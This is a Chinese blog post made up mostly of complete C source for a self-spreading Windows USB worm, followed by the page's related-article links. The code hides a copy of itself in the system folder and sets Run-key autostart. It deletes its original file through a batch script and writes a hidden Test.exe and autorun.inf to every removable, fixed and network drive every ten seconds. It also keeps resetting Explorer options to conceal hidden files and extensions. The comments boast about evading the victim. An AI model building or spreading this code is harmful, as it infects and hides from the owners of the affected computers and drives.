U盘小病毒测试

最新推荐文章于 2019-02-04 11:40:27 发布
最新推荐文章于 2019-02-04 11:40:27 发布
阅读量710 收藏 4
点赞数 1
分类专栏: 病毒 u盘 文章标签: 病毒 u盘 
#include <windows.h>
#include <stdio.h>

void Del();		//自删除
int Ganran(int i);				// 感染模块
void WINAPI ScanDisk();		// 实时监控U盘
void WINAPI ScanRege();		// 实时修改注册表

void WINAPI Root();			// 你可以在这里添加一些恶搞代码 留来扩展用 声明为线程函数

char FileDirSystem[MAX_PATH];		// 源病毒体所在位置
char FileName[MAX_PATH]; // 用来保存 自身路径

  
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
	//
	// 让启动程序时的小漏斗马上消失
	GetInputState();
	PostThreadMessage(GetCurrentThreadId(),NULL,0,0);
	MSG	msg;
	GetMessage(&msg, NULL, NULL, NULL);
	//

	GetModuleFileName(NULL,FileName,MAX_PATH);
	GetSystemDirectory(FileDirSystem,MAX_PATH);
	strcat(FileDirSystem,"\\snss.exe");				
	if (strcmp(FileDirSystem,FileName))				 // 不在系统目录则进行感染
		Ganran(1);
	else
	{
		// 创建一条线程用于修改 显示隐藏系统文件、扩展名的选项 
		// 看你怎么找到我  嘿嘿
 		CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)ScanRege,NULL,NULL,NULL);

		// 创建一条线程用于实时监控U盘
		// 来一个U盘 就得带点东西走
		CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)ScanDisk,NULL,NULL,NULL);

		// 用线程来去完成自己DIY的功能吧 避免代码出了问题 影响整个程序的运行
		CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)Root,NULL,NULL,NULL);
	
		Sleep(999999999); // 主线程进入睡眠状态 累了 是该好好休息啦
		Sleep(999999999);
		Sleep(999999999); // 弄多几个 嘿嘿
		
	}
	return 0;
}

/********************************************************/
//  你想干什么都可以在这里添加代码 自己看着办哈
/********************************************************/
void WINAPI Root()
{
	do 
	{ 
		Sleep(10000); // 没事干 每隔10 秒 震动一下窗口 吓唬吓唬他们
		HWND ForeHandle=GetForegroundWindow(); 
		for(int i=0;i<15;i++)
		{
			RECT rc;
			GetWindowRect(ForeHandle,&rc);
			MoveWindow(ForeHandle,rc.left+8,rc.top+8,rc.right-rc.left,rc.bottom-rc.top,1);
			Sleep(40);
			MoveWindow(ForeHandle,rc.left,rc.top,rc.right-rc.left,rc.bottom-rc.top,1);
			Sleep(40);
			Beep(0x0fff,10);
		}
	} while (1);
}



/********************************************************/
//  感染模块
/********************************************************/
int Ganran(int i)
{
	if (i)   //  感染系统
	{
		

		CopyFile(FileName,FileDirSystem,FALSE);	// 覆盖性自复制至系统目录	
		MessageBox(NULL,"已经将程序复制到系统目录","测试",0);
		SetFileAttributes(FileDirSystem,FILE_ATTRIBUTE_HIDDEN);

		HKEY RegKey;
		 // 开机自启动
		RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
			0, KEY_ALL_ACCESS, &RegKey);
		RegSetValueEx(RegKey, "ctfmonn", 0, REG_SZ, (const BYTE *)&FileDirSystem, MAX_PATH);
		RegCloseKey(RegKey);

		RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
			0, KEY_ALL_ACCESS, &RegKey);
		RegSetValueEx(RegKey, "ctfmonn", 0, REG_SZ, (const BYTE *)&FileDirSystem, MAX_PATH);
		RegCloseKey(RegKey);

		ShellExecute(NULL,"open",FileDirSystem,0,0,SW_HIDE);   // 执行

		Del();	// 自残

		return 1;
	}
	else	// 感染U盘
	{
		strcat(FileName,"Test.exe");
		MessageBox(NULL,"已经将程序复制到U盘","测试",0);	
		FILE *fp;		
		if ((fp=fopen(FileName,"r"))!=NULL) // 检测病毒是否存在 避免重复感染
		{
			fclose(fp);
			return 1;
		}
		CopyFile(FileDirSystem,FileName,FALSE); // 将自身覆盖性复制到U盘
		SetFileAttributes(FileName,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);

		FileName[2]='\0';
		strcat(FileName,"\\autorun.inf");
		if ((fp=fopen(FileName,"w+"))!=NULL)  // 写入autorun.inf文件
		{
	    	fputs("[AutoRun]\n",fp);
			fputs("OPEN=Test.exe\n",fp);
 			fputs("shell\open=打开(&O)\n",fp);
 			fputs("shell\open\Command=Test.exe\n",fp);
			fputs("shell\open\Default=1\n",fp);
			fputs("shell\explore=资源管理器(&X)\n",fp);
			fputs("shell\explore\Command=Test.exe",fp);
			fclose(fp);
			SetFileAttributes(FileName,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
		}
		else	// 无法写入则返回 要么有读锁,要么已经被免疫
			return 1;
	}
}

/********************************************************/
//  自删除功能   
/********************************************************/
void Del()
{
	FILE *fp;
	fp=fopen("C:\\system.bat","w+");
	fprintf(fp,"@echo off \n");
	fprintf(fp,":statr\nif not exist \"%s\" goto done\n",FileName);
	fprintf(fp,"del /f /q \"%s\" \n",FileName);
	fprintf(fp,"goto statr\n");
	fprintf(fp,":done\n");
	fprintf(fp,"del /f /q %%0\n");
	fclose(fp);
	ShellExecute(NULL,"open","C:\\system.bat",0,0,SW_HIDE);	
}

/********************************************************/
//  修改注册表   想找我 窗户都没有 更别说门了
/********************************************************/
void WINAPI ScanRege()		// 实时修改注册表
{
	HKEY RegKey;
	DWORD tmp1 = 1; // 扩展名 1隐藏  0显示
	DWORD tmp2 = 2;  //Hidden 2 隐藏   1 显示隐藏文件
	DWORD tmp0 = 0;  //ShowSuperHidden 0 隐藏  1显示

	do 
	{		
		RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",
			0, KEY_ALL_ACCESS, &RegKey);
		RegSetValueEx(RegKey, "CheckedValue", 0, REG_DWORD, (const BYTE *)&tmp1, sizeof(tmp1));
		RegCloseKey( RegKey );
		
		RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",
			0, KEY_ALL_ACCESS, &RegKey);
		RegSetValueEx(RegKey, "Hidden", 0, REG_DWORD, (const BYTE *)&tmp2, sizeof(tmp2));	
		RegSetValueEx(RegKey, "ShowSuperHidden", 0, REG_DWORD, (const BYTE *)&tmp0, sizeof(tmp0));
		RegSetValueEx(RegKey, "HideFileExt", 0, REG_DWORD, (const BYTE *)&tmp1, sizeof(tmp1));
		RegCloseKey( RegKey );
		Sleep(1000000); 
	} while (1);
}

/********************************************************/
//  实时监控U盘,发现U盘立即进行感染
/********************************************************/
void WINAPI ScanDisk()		// 实时监控U盘   USB 盯死你
{
	char szDriverName[MAX_PATH];
	do 
	{
		strcpy(szDriverName, "C:\\\0");
	
		Sleep(10000); // 每10秒监控一次  避免太消耗系统资源 
		for( szDriverName[0] = 'C'; szDriverName[0] < 'Z'; szDriverName[0]++ )
		{
			// 感染 移动磁盘、固定磁盘、网络磁盘  管你哪种类型的盘 只要可写 都有份 别急
			if( GetDriveType( szDriverName ) == DRIVE_REMOVABLE || GetDriveType( szDriverName ) == DRIVE_FIXED || GetDriveType( szDriverName ) == DRIVE_REMOTE) 
			{
				 strcpy(FileName,szDriverName);				 
				 Ganran(0); 
			}
		}

	} while (1);
		
}

三刺鲎
关注
专栏目录
gh0st源码分析-install classes
qq_22423659的博客
12-13 733
第一次接触到gh0st的源码,一脸懵逼,根本不知道这个源码是干什么的,只见它有三个class类,甚至都不知道怎么编译。 好吧,现在开始我的gh0st源码的自学与分享之路。 参照文章:点击打开链接         我们从整体来看,有三个类,不知道从何看起。然后我们先开始找main函数。在install classes中我们找到了WinMain 入口函数。         GetInputS
教你一种U盘病毒的快速检测方法
weixin_33915554的博客
03-18 243
  U盘对大多数人来说已经不再陌生,它是我们进行文件传输的基本工具。我们可以利用U盘快捷地管理和传输文件,正因为它的轻便,使用U盘的人越来越多。大众化的趋势也滋生了病毒的猖狂,当U盘与电脑连接之后便可能会沾染上病毒,甚是杯具!现在,万能PE官网把一种快速检测U盘病毒的方法分享给大家。   启动计算机,将自己的U盘插入到电脑的USB接口处,第一次插入U盘可能要稍待片刻...
手工清除U盘Survial病毒
01的博客
03-05 1156
Survial.vbe为U盘中的隐藏文件,本质为一个病毒,通过点击受感染的快捷方式进行传染。若在U盘中打开后,会修改注册表,若杀毒软件没有发觉,就会对电脑进行感染,导致插入电脑的U盘都会隐藏所有文件,并生成快捷方式。 清除方法: 先通过文件夹选项显示隐藏和受保护的文件 确认U盘中存在 Survial.vbe ,此时不要点开U盘中的任何文件 在进程中找到wscript.exe 结束该进程 从
手把手教你解决U盘快捷方式病毒
开飞机的小毛驴儿
03-29 3万+
这周有组会报告啊,今晚回到宿舍本身想看看论文总结一下的,但同学发来一个消息说U盘病毒了,求救SOS!可我并不擅长这些东西,远程看到U盘里都是快捷方式,隐藏了一个crack文件,现成的U盘杀毒软件也无效,慢慢搜索综合几处参考资料,最终完美解决,故作此总结。 1.其实这种病毒只是将你的文件给你隐藏了,所以最先开始要做的是找到对应的U盘路径打开文件夹选项,选择显示隐藏的项目和受系统保护的文件; 2
查杀磁盘U盘Synaptics(蠕虫病毒
04-17
双击打开并且等待结果就行。 2020-11-17更新 修复不扫描非NTFS格式磁盘以及U盘功能 2020-05-22更新 1:增加全盘扫描 2:增加U盘扫描 3:增加第二套扫描模式...被感染的xlsm文件恢复还处于验证阶段,需要你们的测试结果
U盘病毒专杀测试
01-06
标题中的“U盘病毒专杀测试版”指的是一个专门设计用于检测和清除U盘病毒的软件工具。在IT行业中,U盘病毒是一种常见的恶意软件传播方式,它们通常利用USB设备的便携性和广泛使用性来感染用户的电脑系统。这种类型...
易语言源码U盘病毒专杀.rar
02-15
8. **程序调试与测试**:源码完成后,需要进行调试和测试,以确保程序能在各种情况下正确运行,有效识别和消除病毒。 9. **病毒库更新**:为了应对不断演变的病毒病毒专杀工具通常需要定期更新病毒数据库,学习...
计算机病毒知识测试题.docx
12-22
对于已感染病毒U盘,最彻底的消除病毒方法是对其进行格式化(选项D)。虽然删除感染病毒的程序可能暂时解决问题,但病毒可能已经潜伏在其他位置,格式化可以确保所有病毒痕迹都被清除。 计算机病毒的主要危害在于...
U盘病毒批处理 病毒 U盘
05-22
标题中的“U盘病毒批处理”是指一种利用批处理脚本来防止U盘感染病毒的技术。在Windows操作系统中,批处理脚本(.cmd文件)是一种简单易用的自动化工具,可以执行一系列命令行操作,以此来实现特定的功能。在这个...
我与U盘病毒抗争的那几年——一个特别的进程U盘病毒
进击的葱
02-04 846
相识 记得大一的时候,当时U盘中了一种病毒,类似于就是将你的其它文件隐藏,只留下一个病毒文件的快捷方式,这种病毒很好解决,只需要设置文件夹的属性,查看隐藏界面: 这时候如果你发现一个文件夹里面有.vbs的文件,删除它,并且吧 在使用U盘的时候,经常打开U盘却看不到文件。其实这个问题是由病毒引起的,但是杀毒软件很容易将U盘病毒伪装的文件删除,导致重要文件的丢失,其实可以不用任何杀毒工具就能...
采用CreateThread()创建多线程程序
热门推荐
cbNotes的专栏:不积硅步,无以至千里;不积小流,无以成江海!
12-10 6万+
采用CreateThread()创建多线程程序 在window环境下,Win32 提供了一系列的API函数来完成线程的创建、挂起、恢复、终结以及通信等工作: 1、主要的函数列表: 序号 函数名 功能 1 CreateThread() 创建一个新线程 2 ExitThread() 正
怎么清除U盘病毒的简单步骤
凡尘
03-27 1万+
第一步:插入U盘后单击“开始”菜单,找到“运行”并单击,出现【运行】窗口后,在其中输入gpedit.msc,点击“确定”后,会出现一个“组策略”的窗口,在左侧依次找到“计算机配置”-&gt;“管理模板”-&gt;“系统”并单击打开,之后右侧会出现一个“关闭自动播放”的项,双击打开。在出现的窗口中点击选择“已启用”,在下面的列表中选择“所有驱动器”,点击“确定”。现在你可以将自己的盘与电脑连接了。但...
关于u盘快捷方式病毒的解决方案
coordinate的博客
10-28 1万+
最近学校的电脑中了病毒,导致上课时u盘插上电脑后,u盘里面的文件全变成了快捷方式。可能是xxx的一个恶作剧吧,但是挺麻烦的。解决方法非常简单@echo off @echo 2017.10.28 by coordinate @echo +-------------------------------------------------------------+ attrib -s -h *. /S /
U盘产生快捷方式病毒
nlgshw的专栏
01-07 9855
u盘不小心染了病毒,文件都变成了快捷方式,真实的源文件都变成了隐藏文件,看着这么多快捷方式真是不开心。 这个病毒的机制也很简单,它在u盘里放了一个survival.vbe文件,就感染了u盘,然后在电脑的c盘放两个survival.vbe文件,就达到了感染电脑的目的。 解决方法(删除所有的vbe文件就行了):      1.设置文件夹选项,将隐藏文件都显示出来。      2
u盘打开之后就只有一个快捷方式
code_AC的博客
11-20 2万+
我今天也出现了这种问题,百度一下发现都解决不了,然后自己尝试了一个新的方法:其实还有一个又简单又好用又快捷的方法就是。 1、只要你记得你的U盘里的任何一个文件或者文件夹的名称, 2、然后搜索U盘,之后就会显示出来在U盘里的那个文件或者文件夹, 3、然后按右键“打开文件位置”,那你就能找到你的文件所在, 4、将文件或者文件夹拷贝到你的电脑里 5、将最上面的“标题栏”上的位置返回到上一级(甚
Word中数据的计算.pdf
最新发布
10-11
Word中数据的计算.pdf
Microsoft Project Portfolio Server 2007 Datasheet_CN_Final.doc
10-11
Microsoft Project Portfolio Server 2007 Datasheet_CN_Final.doc
JaroWinklerSimilarity
10-11
Jaro-Winkler 相似度(Jaro-Winkler Similarity)是一种用于衡量两个字符串相似度的算法,特别适用于比较短字符串或需要考虑字符顺序的情况。它在信息检索、数据清洗和拼写校正等领域广泛应用。 主要特点 基本原理: Jaro-Winkler 相似度基于 Jaro 距离,这一距离主要考虑字符的匹配和顺序。 该算法首先计算两个字符串的匹配字符和匹配位置,以此计算相似度。 加权机制: Jaro-Winkler 在 Jaro 的基础上增加了对前缀匹配的奖励,这意味着如果两个字符串的开头部分相同,算法将给予更高的相似度评分。 结果范围: 相似度的值在 0 到 1 之间,1 表示完全相同,0 表示完全不同。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值